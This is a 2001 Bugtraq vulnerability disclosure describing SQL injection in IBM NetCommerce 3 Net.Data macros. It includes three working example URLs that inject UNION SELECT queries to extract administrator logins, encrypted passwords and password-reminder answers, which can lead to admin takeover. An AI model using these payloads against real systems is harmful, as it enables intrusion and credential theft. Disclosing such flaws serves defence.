[19012] in bugtraq
IBM NetCommerce Security
daemon@ATHENA.MIT.EDU (rudi carell)
Mon Feb 5 15:32:33 2001
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F40LUDA1XiHY5FbEFYa000003eb@hotmail.com>
Date: Mon, 5 Feb 2001 11:13:10 -0700
Reply-To: rudi carell <rudicarell@HOTMAIL.COM>
From: rudi carell <rudicarell@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
hola friends,
while i was participating on the openhack contest
i found a couple of serious security-holes within ibm s
so called "netcommerce" thing which seems to be a mixture of
websphere, net.data, servlets, jsp s and db2?
however..summary:
class: input validation error
remote: yes
local: yes
vulnerable: ibm netcommerce 3???
description:
besides well known websphere-bugs (file thru disclosure and default-admin
passwords) ...
the most dangerous bugs result from NON-existing input validation within
netcommerc s net.data "macros".
by crafting malformed http-requests it is possible to extract "any"
netcommerce-database-information.
combining this method with other default-"netcommerce" funcionality
(PasswordReset for example) it is possible to take hold of so called
"store-" or "site-manager"-accounts.
once youre an nc-administrator you are allowed to use all the admin-tools.
at this point youre able to up- and download files, issue op-system-commands
or do any query with the very very high-privileged DB2INST1 account.
this can lead to a possible take-over of the whole system....
many "default-macros" are vulnerable to this (classic:-) sort of attack.
exploit:
a few examples:
1) "HowTo find Administrator Accounts"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';
2) "Passwords(crypted)"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
3) "Password-Reminders"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
of course "orderdspc.d2w" is not the only vulnerable macro .. it s just an
example. casting between different data-types is possible (read the db2-man
pages).
also it should(not proofed) be possible to query other databases.
vendor status:
this mail was sent to "ers@ers.ibm.com" last week.
(ers = emergency response team)
nice day,
rc
rudicarell@hotmail.com
security@freefly.com
<FLAME> due to the very unprofessional(or should i say unfair) system-setup
of the openhack-servers i was not able to proof the whole concept </FLAME>
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
